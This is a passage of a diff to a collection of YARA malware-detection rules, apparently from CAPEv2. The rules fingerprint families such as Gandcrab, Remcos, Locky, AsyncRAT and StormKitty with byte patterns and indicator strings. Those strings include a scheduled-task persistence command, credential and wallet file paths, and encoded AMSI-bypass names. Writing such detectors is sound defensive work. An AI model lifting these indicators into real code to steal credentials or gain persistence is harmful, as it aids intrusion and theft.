+            8B 00
+            8B 00
+            8B 40 18
+            89 45 FC
+            8B 45 FC
+            8B E5
+            5D
+            C3
+        }
+		$language_check = {
+            FF 15 ?? ?? ?? ??
+            0F B7 C0
+            89 45 ??
+            81 7D ?? 3F 04 ?? ??
+            7F
+        }
+		$ext1 = ".zoo" ascii
+		$ext2 = ".arc" ascii
 
 	condition:
-		uint16( 0 ) == 0x5a4d and ( 3 of ( $s* ) )
+		uint16( 0 ) == 0x5A4D and ( ( $loaded_modules and $language_check and $ext1 and $ext2 ) or ( all of ( $string* ) or 7 of ( $v* ) ) )
 }
-rule CAPE_Stealc : FILE
+rule CAPE_Gandcrab : FILE
 {
 	meta:
-		description = "Stealc Payload"
+		description = "Gandcrab Payload"
 		author = "kevoreilly"
-		id = "77567584-7c84-5351-938b-d29d612a042d"
-		date = "2023-02-22"
-		modified = "2025-08-21"
+		id = "0082e8c9-952e-508c-a438-4e17b8031864"
+		date = "2019-10-30"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Stealc.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "77d6f1914af6caf909fa2a246fcec05f500f79dd56e5d0d466d55924695c702d"
-		logic_hash = "a6165168b7c74761b91d1691465688c748227b830813067edb4e9bdc934271c4"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Gandcrab.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "354ed566dbafbe8e9531bb771d9846952eb8c0e70ee94c26d09368159ce4142c"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Stealc Payload"
+		cape_type = "Gandcrab Payload"
 
 	strings:
-		$nugget1 = {68 04 01 00 00 6A 00 FF 15 [4] 50 FF 15}
-		$nugget2 = {64 A1 30 00 00 00 8B 40 0C 8B 40 0C 8B 00 8B 00 8B 40 18 89 45 FC}
+		$string1 = "GDCB-DECRYPT.txt" wide
+		$string2 = "GandCrabGandCrabnomoreransom.coinomoreransom.bit"
+		$string3 = "action=result&e_files=%d&e_size=%I64u&e_time=%d&" wide
+		$string4 = "KRAB-DECRYPT.txt" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and all of them
+		uint16( 0 ) == 0x5A4D and any of ( $string* )
 }
-rule CAPE_Stealcv2 : FILE
+rule CAPE_Vipkeylogger : FILE
 {
 	meta:
-		description = "Stealc V2 Payload"
+		description = "Detects VIPKeyLogger Keylogger"
 		author = "kevoreilly"
-		id = "0f72c468-9485-5e29-b29a-7dfc3e579e02"
-		date = "2023-02-22"
-		modified = "2025-08-21"
+		id = "71606fcc-89b4-519a-833a-b6cb4b569cb8"
+		date = "2025-09-11"
+		modified = "2025-09-11"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Stealc.yar#L15-L32"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "911c6a7f63e91a788898f3cc6e66396e39d5bd48f8fbaac49ee5dbbdaa64d5a0"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/VIPKeyLogger.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "b9dba7562bba4807c0789692d44650996e62c8d0c4031dedd65773877621b1de"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Stealc Payload"
-		packed = "2f42dcf05dd87e6352491ff9d4ea3dc3f854df53d548a8da0c323be42df797b6"
-		packed = "8301936f439f43579cffe98e11e3224051e2fb890ffe9df680bbbd8db0729387"
+		cape_type = "VIPKeyLogger Payload"
+		packed = "edaba79c3d43a416a86003f336d879ed3a513aa24dd401340584615647ed6da2"
 
 	strings:
-		$decode32 = {AB AB AB AB 8B 45 0C 89 4E 10 89 4E 14 39 45 08 75 0B C7 46 14 0F 00 00 00 88 0E EB 0F 2B 45 08 50 51 FF 75 ?? 8B}
-		$dump32 = {33 C0 89 46 30 88 46 34 89 46 38 89 46 3C 89 46 40 89 46 44 89 46 48 89 46 4C 89 46 50 89 46 54 89 46 58 8B C6 5F 5E C3}
-		$date32 = {F3 A5 8D 45 ?? 50 E8 [4] 59 8B F8 8B F2 8D 45 A4 50 E8 [4] 59 3B F2 7C 08 7F 04 3B F8 76 02 B3 01 8A C3}
-		$decode64 = {40 53 48 83 EC 20 48 8B 19 48 85 DB 74 ?? 48 8B 53 18 48 83 FA 0F 76 2C 48 8B 0B 48 FF C2 48 81 FA 00 10 00 00 72}
-		$dump64 = {48 8B C7 89 6F 40 40 88 6F 44 48 89 6F 48 48 89 6F 50 48 89 6F 58 48 89 6F 60 48 89 6F 68 48 89 6F 70 48 89 6F 78 48 89}
-		$date64 = {0F 11 44 [2] 0F 11 8C [2] 00 00 00 89 8C [2] 00 00 00 48 8D 4C [2] E8 [4] 48 8B D8 48 8D 4C [2] E8 [4] 48 3B D8 0F 9F C0}
+		$s1 = "/ VIP Recovery \\" wide
+		$s2 = "Clipboard Logs ID" wide
+		$s3 = "Keylogger" wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16( 0 ) == 0x5a4d and all of them
 }
-rule CAPE_Ursnif : FILE
+rule CAPE_Kovter : FILE
 {
 	meta:
-		description = "Ursnif Payload"
-		author = "kevoreilly & enzo"
-		id = "200c2227-0d34-5e4a-b5aa-ab63a077d141"
+		description = "Kovter Payload"
+		author = "kevoreilly"
+		id = "3dec3c4b-4678-5ed1-a4c3-c3d9abb58b1c"
 		date = "2019-10-30"
 		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Ursnif.yar#L1-L19"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "46e79fde81ff5352314618021e394b2e0322df07170c7279363290b7134935fd"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Kovter.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "888fccb8fbfbe6c05ec63bc5658b4743f8e10a96ef51b3868c2ff94afec76f2d"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Ursnif Payload"
+		cape_type = "Kovter Payload"
 
 	strings:
-		$crypto64_1 = {41 8B 02 ?? C1 [0-1] 41 33 C3 45 8B 1A 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 D?}
-		$crypto64_2 = {44 01 44 24 10 FF C1 41 8B C0 D1 64 24 10 33 C3 41 8B D8 FF 4C 24 10 41 33 C3 01 44 24 10 D3 C8 01 44 24 10 41 89 02 49 83 C2 04 83 C2 FF 75 C3}
-		$crypto64_3 = {33 C6 ?? C7 [0-1] 49 83 C2 04 33 C3 8B F1 8B CF D3 C8 89 02 48 83 C2 04 41 83 C3 FF 75 ?? 45 85 C9 75 ?? 41 83 E0 03}
-		$crypto64_4 = {41 8B 02 41 8B CB 41 83 F3 01 33 C3 41 8B 1A C1 E1 03 41 33 C0 D3 C8 41 89 02 49 83 C2 04 83 C2 FF 75 C6}
-		$decrypt_config64 = {44 8B D9 33 C0 45 33 C9 44 33 1D ?? ?? ?? 00 ?? ?? D2 ?? ?? D2 74 ?? 4C 8D 42 10 45 3B 0A 73 2? 45 39 58 F8 75 1C 41 F6 40 FC 01 74 12}
-		$crypto32_1 = {01 45 FC D1 65 FC FF 4D FC 33 C1 33 45 0C 01 45 FC 43 8A CB D3 C8 8B CE 01 45 FC 89 02 83 C2 04 FF 4D 08 75 CD}
-		$crypto32_2 = {33 C1 33 44 24 10 43 8A CB D3 C8 8B CE 89 02 83 C2 04 FF 4C 24 0C 75 D9}
-		$decrypt_config32 = {8B ?? 08 5? 33 F? 3B [1-2] 74 14 A1 0? ?? ?? ?? 35 ?? ?? ?? ?? 50 8B D? E8 ?? D? 00 00 EB 02 33 C0 ?B ?? ?? ?? ?? ?? ?? ?? 74 14 8D 4D ?? ?? ?? 50 FF D? 85 C0 74 08}
+		$a1 = "chkok"
+		$a2 = "k2Tdgo"
+		$a3 = "13_13_13"
+		$a4 = "Win Server 2008 R2"
 
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $decrypt_config64 and any of ( $crypto64* ) ) or ( $decrypt_config32 and any of ( $crypto32* ) )
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
 }
-rule CAPE_Tclient : FILE
+rule CAPE_Remcos : FILE
 {
 	meta:
-		description = "TClient Payload"
+		description = "Remcos Payload"
 		author = "kevoreilly"
-		id = "38c9ea20-9d91-5fb0-8b3b-170538ad7ea8"
+		id = "f77295ca-02d5-5b2c-80b8-b6566610bff8"
 		date = "2019-10-30"
-		modified = "2022-06-09"
+		modified = "2022-05-10"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/TClient.yar#L1-L11"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "6edcd01e4722b367723ed77d9596877d16ee35dc4c160885d125f83e45cee24d"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Remcos.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "38142e784ad437d9592353b924f74777bb62e5ed176c811230a2021a437d4710"
 		score = 75
-		quality = 70
+		quality = 68
 		tags = "FILE"
-		cape_type = "TClient Payload"
+		cape_type = "Remcos Payload"
 
 	strings:
-		$code1 = {41 0F B6 00 4D 8D 40 01 34 01 8B D7 83 E2 07 0F BE C8 FF C7 41 0F BE 04 91 0F AF C1 41 88 40 FF 81 FF 80 03 00 00 7C D8}
+		$name = "Remcos" nocase
+		$time = "%02i:%02i:%02i:%03i"
+		$crypto1 = {81 E1 FF 00 00 80 79 ?? 4? 81 C9 00 FF FF FF 4? 8A ?4 8?}
+		$crypto2 = {0F B6 [1-7] 8B 45 08 [0-2] 8D 34 07 8B 01 03 C2 8B CB 99 F7 F9 8A 84 95 ?? ?? FF FF 30 06 47 3B 7D 0C 72}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and any of ( $code* )
+		uint16( 0 ) == 0x5A4D and ( $name ) and ( $time ) and any of ( $crypto* )
 }
-rule CAPE_Tscookie : FILE
+rule CAPE_Locky : FILE
 {
 	meta:
-		description = "TSCookie Payload"
+		description = "Locky Payload"
 		author = "kevoreilly"
-		id = "e1efd356-7170-5454-bf40-68927c71816c"
+		id = "664d0365-af49-5222-a4ed-9260332f6940"
 		date = "2019-10-30"
-		modified = "2019-10-30"
+		modified = "2022-06-09"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/TSCookie.yar#L1-L13"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "0461c7fd14c74646437654f0a63a4a89d4efad620e197a8ca1e8d390618842c3"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Locky.yar#L1-L14"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "9786c54a2644d9581fefe64be11b26e22806398e54e961fa4f19d26eae039cd7"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "TSCookie Payload"
+		cape_type = "Locky Payload"
 
 	strings:
-		$string1 = "http://%s:%d" wide
-		$string2 = "/Default.aspx" wide
-		$string3 = "\\wship6"
+		$string1 = "wallet.dat" wide
+		$string2 = "Locky_recover" wide
+		$string3 = "opt321" wide
 
 	condition:
 		uint16( 0 ) == 0x5A4D and all of them
 }
-rule CAPE_Carbanak : FILE
+rule CAPE_Obfuscar : FILE
 {
 	meta:
-		description = "Carnbanak Payload"
-		author = "enzok"
-		id = "e6d395d5-65ba-5efb-bcbc-c6d56a96f0c1"
-		date = "2023-11-30"
-		modified = "2024-03-18"
+		description = "Obfuscar xor routime"
+		author = "kevoreilly"
+		id = "81eeb62f-578f-5c75-bc96-091d5727a20a"
+		date = "2025-03-07"
+		modified = "2025-03-07"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Carbanak.yar#L1-L14"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "c9c1b06cb9c9bd6fc4451f5e2847a1f9524bb2870d7bb6f0ee09b9dd4e3e4c84"
-		logic_hash = "8ed5ab07f1635dc7cdf296e86a71a0a99d0b2faef8fc460f43d426b24b8c8367"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Obfuscar.yar#L1-L12"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "54581e83e5fa13fae4bda74016b3fa1d18c92e2659f493ebe54d70fd5f77bba5"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "Carbanak Payload"
 
 	strings:
-		$sboxinit = {0F BE 02 4? 8D 05 [-] 4? 8D 4D ?? E8 [3] 00 33 F6 4? 8D 5D ?? 4? 63 F8 8B 45 ?? B? B1 E3 14 06}
-		$decode_string = {0F BE 03 FF C9 83 F8 20 7D ?? B? 1F [3] 4? 8D 4A E2 EB ?? 3D 80 [3] 7D ?? B? 7F [3] 4? 8D 4A A1 EB ?? B? FF [3] 4? 8D 4A 81}
-		$constants = {0F B7 05 [3] 00 0F B7 1D [3] 00 83 25 [3] 00 00 89 05 [3] 00 0F B7 05 [3] 00 89 1D [3] 00 89 05 [3] 00 33 C0 4? 8D 4D}
+		$decode = {06 91 06 61 20 [4] 61 D2 9C 06 17 58 0A 06 7E [4] 8E 69 FE 04 2D ?? 2A}
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 2 of them
+		uint16( 0 ) == 0x5A4D and any of them
 }
-rule CAPE_Latrodectus_1
+rule CAPE_Formbook
 {
 	meta:
-		description = "Latrodectus Payload"
-		author = "enzok"
-		id = "956b6736-b3ef-5974-b3dd-02d04336dbe8"
-		date = "2024-01-18"
-		modified = "2025-05-10"
+		description = "Formbook Payload"
+		author = "kevoreilly"
+		id = "3389c0a7-eb86-5465-8a14-63f812d257db"
+		date = "2019-10-30"
+		modified = "2023-10-13"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Latrodectus.yar#L1-L16"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "a547cff9991a713535e5c128a0711ca68acf9298cc2220c4ea0685d580f36811"
-		logic_hash = "a8430299930f4c8de0a88c6836d4821871f7183cc5ff44ea9be84fbea47bbb13"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Formbook.yar#L1-L18"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "63ee4dd6fe5ed2a3e5ee88ba7de48d2c9e0024961a550d0fdb68891c9885e05e"
 		score = 75
 		quality = 70
 		tags = ""
-		cape_type = "Latrodectus Payload"
+		cape_type = "Formbook Payload"
+		packed = "9e38c0c3c516583da526016c4c6a671c53333d3d156562717db79eac63587522"
+		packed = "2379a4e1ccdd7849ad7ea9e11ee55b2052e58dda4628cd4e28c3378de503de23"
 
 	strings:
-		$fnvhash1 = {C7 04 24 C5 9D 1C 81 48 8B 44 24 20 48 89 44 24 08}
-		$fnvhash2 = {8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01}
-		$procchk1 = {E8 [3] FF 85 C0 74 [2] FF FF FF FF E9 [4] E8 [4] 89 44 24 ?? E8 [4] 83 F8 4B 73 ?? 83 [3] 06}
-		$procchk2 = {72 [2] FF FF FF FF E9 [4] E8 [4] 83 F8 32 73 ?? 83 [3] 06}
-		$version = {C7 44 2? ?? ?? 00 00 00 C7 44 2? ?? ?? 00 00 00 8B 05 [4] 89}
+		$remap_ntdll = {33 56 0? 8D 86 [2] 00 00 68 F0 00 00 00 50 89 56 ?? E8 [4] 8B [1-5] 6A 00 6A 04 8D 4D ?? 51 6A 07 52 56 E8 [4] 8B 45 ?? 83 C4 20 3B}
+		$rc4dec = {F7 E9 C1 FA 03 8B C2 C1 E8 1F 03 C2 8D 04 80 03 C0 03 C0 8B D1 2B D0 8A 04 3A 88 8C 0D [4] 88 84 0D [4] 41 81 F9 00 01 00 00 7C}
+		$decrypt = {8A 50 01 28 10 48 49 75 F7 83 FE 01 76 14 8B C7 8D 4E FF 8D 9B 00 00 00 00 8A 50 01 28 10 40 49 75 F7}
+		$string = {33 C0 66 39 01 74 0B 8D 49 00 40 66 83 3C 41 00 75 F8 8B 55 0C 8D 44 00 02 50 52 51 E8}
+		$mutant = {64 A1 18 00 00 00 8B 40 ?? 89 45 ?? 8B 45 ?? 8B 40 ?? 8B E5 5D C3}
+		$postmsg = {8B 7D 0C 6A 00 6A 00 68 11 01 00 00 57 FF D6 85 C0 75 ?? 50}
 
 	condition:
-		all of them
+		2 of them
 }
-rule CAPE_Latrodectus_AES
+rule CAPE_Mole : FILE
 {
 	meta:
-		description = "Latrodectus Payload"
-		author = "enzok"
-		id = "16c295f5-cea0-57b5-b826-e1126e50c8cc"
-		date = "2024-01-18"
-		modified = "2025-05-10"
+		description = "Mole Payload"
+		author = "kevoreilly"
+		id = "1185170f-4a5b-5347-807b-ef2af98a1a09"
+		date = "2019-10-30"
+		modified = "2019-10-30"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/Latrodectus.yar#L18-L34"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "5cecb26a3f33c24b92a0c8f6f5175da0664b21d7c4216a41694e4a4cad233ca8"
-		logic_hash = "058d278c16527969066d1b4ea7f0e3ab2809d5480cdab06ec476b465e0c4795a"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/Mole.yar#L1-L13"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "8be4d190d554a610360c0e04b33da59eb00319395e5b2000d580546ce6503786"
 		score = 75
 		quality = 70
+		tags = "FILE"
+		cape_type = "Mole Payload"
+
+	strings:
+		$a1 = ".mole0" wide
+		$a2 = "_HELP_INSTRUCTION.TXT" wide
+		$a3 = "-----BEGIN PUBLIC KEY----- MIGfMA0GCSqGSIb3DQEBAQUAA4GNADCBiQKBgQ"
+
+	condition:
+		uint16( 0 ) == 0x5A4D and ( all of ( $a* ) )
+}
+rule CAPE_Asyncrat_Kingrat
+{
+	meta:
+		description = "No description has been set in the source file - CAPE"
+		author = "jeFF0Falltrades"
+		id = "45efdcdf-b255-5913-97eb-f296d2c4eb1f"
+		date = "2024-10-09"
+		modified = "2025-02-03"
+		reference = "https://github.com/kevoreilly/CAPEv2"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AsyncRAT.yar#L1-L30"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "1400d2029dfb66d8f2dc34db8643d6301f3af9bd356639f883d2c10bcc0c3947"
+		score = 75
+		quality = 58
 		tags = ""
-		cape_type = "Latrodectus Payload"
+		cape_type = "AsyncRAT Payload"
 
 	strings:
-		$fnvhash1 = {C7 04 24 C5 9D 1C 81 48 8B 44 24 20 48 89 44 24 08}
-		$fnvhash2 = {8B 0C 24 33 C8 8B C1 89 04 24 69 04 24 93 01 00 01}
-		$key = {C6 44 2? ?? ?? [150] C6 44 2? ?? ?? B8 02}
-		$aes_ctr_1 = {8B 44 24 ?? FF C8 89 44 24 ?? 83 7C 24 ?? 00 7C ?? 4? 63 44 24 ?? 4? 8B 4C 24 ?? 0F B6 84 01 F0 00 00 00 3D FF 00 00 00}
-		$aes_ctr_2 = {48 03 C8 48 8B C1 0F B6 ?? 48 63 4C 24 ?? 0F B6 4C 0C ?? 33 C1 48 8B 4C 24 ?? 48 8B 54 24 ?? 48 03 D1 48 8B CA 88 01}
-		$version = {C7 44 2? ?? ?? 00 00 00 C7 44 2? ?? ?? 00 00 00 8B 05 [4] 89}
+		$str_async = "AsyncClient" wide ascii nocase
+		$str_aes_exc = "masterKey can not be null or empty" wide ascii
+		$str_schtasks = "schtasks /create /f /sc onlogon /rl highest" wide ascii
+		$byte_aes_key_base = { 7E [3] 04 73 [3] 06 80 }
+		$byte_aes_salt_base = { BF EB 1E 56 FB CD 97 3B B2 19 }
+		$patt_verify_hash = { 7e [3] 04 6f [3] 0a 6f [3] 0a 74 [3] 01 }
+		$patt_config = { 72 [3] 70 80 [3] 04 }
+		$dcrat_1 = "dcrat" wide ascii nocase
+		$dcrat_2 = "qwqdan" wide ascii
+		$dcrat_3 = "YW1zaS5kbGw=" wide ascii
+		$dcrat_4 = "VmlydHVhbFByb3RlY3Q=" wide ascii
+		$dcrat_5 = "save_Plugin" wide ascii
+		$ww2 = "WorldWindClient" wide fullword nocase
+		$ww3 = "WorldWindStealer" wide fullword nocase
+		$ww4 = "*WorldWind Pro - Results:*" wide fullword nocase
+		$ww5 = /WorldWind(\s)?Stealer/ ascii wide
+		$prynt = /Prynt(\s)?Stealer/ ascii wide
 
 	condition:
-		all of them
+		( not any of ( $dcrat* ) and not any of ( $ww* ) and not $prynt ) and 6 of them and #patt_config >= 10
 }
-rule CAPE_Nightshadec2 : FILE
+rule CAPE_Stormkitty : FILE
 {
 	meta:
-		description = "NightshadeC2 AKA CastleRAT - https://x.com/YungBinary/status/1963751038340534482"
-		author = "YungBinary"
-		id = "d70f9051-c7ab-537a-ab80-03ae7ef80b81"
-		date = "2025-09-04"
-		modified = "2025-09-12"
+		description = "StormKitty infostealer payload"
+		author = "ditekSHen"
+		id = "71239da9-064f-58c4-a6fa-eb4983a3f55e"
+		date = "2024-10-09"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/NightshadeC2.yar#L1-L20"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		hash = "963c012d56c62093d105ab5044517fdcce4ab826f7782b3e377932da1df6896d"
-		logic_hash = "f9fabc391e21180a1c92abea0a5ded6d7669e8d8f2330b69d6c1227c9b4237a0"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AsyncRAT.yar#L32-L57"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "258f5d9da80ff912459194b1139f062491df21a44456942951e2bd98e4b86c9b"
 		score = 75
-		quality = 70
+		quality = 66
 		tags = "FILE"
-		cape_type = "NightshadeC2 Payload"
+		cape_type = "StormKitty Payload"
 
 	strings:
-		$s1 = "keylog.txt" fullword wide
-		$s2 = "\"%ws\" --mute-audio --do-not-de-elevate" fullword wide
-		$s3 = "\"%ws\" -no-deelevate" fullword wide
-		$s4 = "MachineGuid" fullword wide
-		$s5 = "www.ip-api.com" fullword wide
-		$s6 = "rundll32 \"C:\\Windows\\System32\\shell32.dll\" #61" fullword wide
-		$s7 = "IsabellaWine" fullword wide
-		$s8 = "Shell_TrayWnd" fullword wide
+		$x1 = "\\ARTIKA\\Videos\\Chrome-Password-Recovery" ascii
+		$x2 = "https://github.com/LimerBoy/StormKitty" fullword ascii
+		$x3 = "StormKitty" fullword ascii
+		$s1 = "GetBSSID" fullword ascii
+		$s2 = "GetAntivirus" fullword ascii
+		$s3 = "C:\\Users\\Public\\credentials.txt" fullword wide
+		$s4 = "^([a-zA-Z0-9_\\-\\.]+)@([a-zA-Z0-9_\\-\\.]+)\\.([a-zA-Z]{2,5})$" fullword wide
+		$s5 = "BCrypt.BCryptGetProperty() (get size) failed with status code:{0}" fullword wide
+		$s6 = "\"encrypted_key\":\"(.*?)\"" fullword wide
+		$ww2 = "WorldWindClient" wide fullword nocase
+		$ww3 = "WorldWindStealer" wide fullword nocase
+		$ww4 = "*WorldWind Pro - Results:*" wide fullword nocase
+		$ww5 = /WorldWind(\s)?Stealer/ ascii wide
+		$prynt = /Prynt(\s)?Stealer/ ascii wide
 
 	condition:
-		uint16( 0 ) == 0x5A4D and 3 of them
+		uint16( 0 ) == 0x5a4d and ( not any of ( $ww* ) and not $prynt ) and ( 2 of ( $x* ) or 5 of ( $s* ) or ( 3 of ( $s* ) and 1 of ( $x* ) ) )
 }
-rule CAPE_Dridexloader_1 : FILE
+rule CAPE_Worldwind : FILE
 {
 	meta:
-		description = "Dridex v4 dropper C2 parsing function"
-		author = "kevoreilly"
-		id = "43bd9631-4611-567c-bee5-d926e060b977"
-		date = "2019-11-12"
-		modified = "2021-03-10"
+		description = "Detects WorldWind infostealer"
+		author = "ditekSHen"
+		id = "226f591a-dc06-54f5-96ae-d142f624ff71"
+		date = "2024-10-09"
+		modified = "2025-02-03"
 		reference = "https://github.com/kevoreilly/CAPEv2"
-		source_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/data/yara/CAPE/DridexLoader.yar#L1-L17"
-		license_url = "https://github.com/kevoreilly/CAPEv2/blob/7ace95378cd09c8e26138125761b13750dfc6cb4/LICENSE"
-		logic_hash = "20696b1f14539c8ecf21bffc696596040c20b1ee2fcedc173945482c0baca588"
+		source_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/data/yara/CAPE/AsyncRAT.yar#L60-L82"
+		license_url = "https://github.com/kevoreilly/CAPEv2/blob/a9a0887dab232f52c59e955b9984dd494c47ce6b/LICENSE"
+		logic_hash = "9bb04fad460193cd877ea7f2de9337f69aadda01aee6c79f0a23cdf564b1e6c8"
 		score = 75
 		quality = 70
 		tags = "FILE"
-		cape_type = "DridexLoader Payload"
+		cape_type = "WorldWind Payload"
 
 	strings:
-		$c2parse_1 = {57 0F 95 C0 89 35 [4] 88 46 04 33 FF 80 3D [4] 00 76 54 8B 04 FD [4] 8D 4D EC 83 65 F4 00 89 45 EC 66 8B 04 FD [4] 66 89 45 F0 8D 45 F8 50}
-		$c2parse_2 = {89 45 00 0F B7 53 04 89 10 0F B6 4B 0C 83 F9 0A 7F 03 8A 53 0C 0F B6 53 0C 85 D2 7E B7 8D 74 24 0C C7 44 24 08 00 00 00 00 8D 04 7F 8D 8C 00}
-		$c2parse_3 = {89 08 66 39 1D [4] A1 [4] 0F 95 C1 88 48 04 80 3D [4] 0A 77 05 A0 [4] 80 3D [4] 00 56 8B F3 76 4E 66 8B 04 F5}
-		$c2parse_4 = {0F B7 C0 89 01 A0 [4] 3C 0A 77 ?? A0 [4] A0 [4] 57 33 FF 84 C0 74 ?? 56 BE}
-		$c2parse_5 = {0F B7 05 [4] 89 02 89 15 [4] 0F B6 15 [4] 83 FA 0A 7F 07 0F B6 05 [4] 0F B6 05 [4] 85 C0}
-		$c2parse_6 = {0F B7 53 ?? 89 10 0F B6 4B ?? 83 F9 0A 7F 03 8A 53 ?? 0F B6 53 ?? 85 D2 7E B9}
+		$c1 = /WorldWind(\s)?Stealer/ ascii wide
+		$x2 = "@FlatLineStealer" ascii wide
+		$x3 = "@CashOutGangTalk" ascii wide
+		$m1 = ".Passwords.Targets." ascii
+		$m2 = ".Modules.Keylogger" ascii
+		$m3 = ".Modules.Clipper" ascii
+		$m4 = ".Modules.Implant" ascii
+		$s1 = "--- Clipper" wide
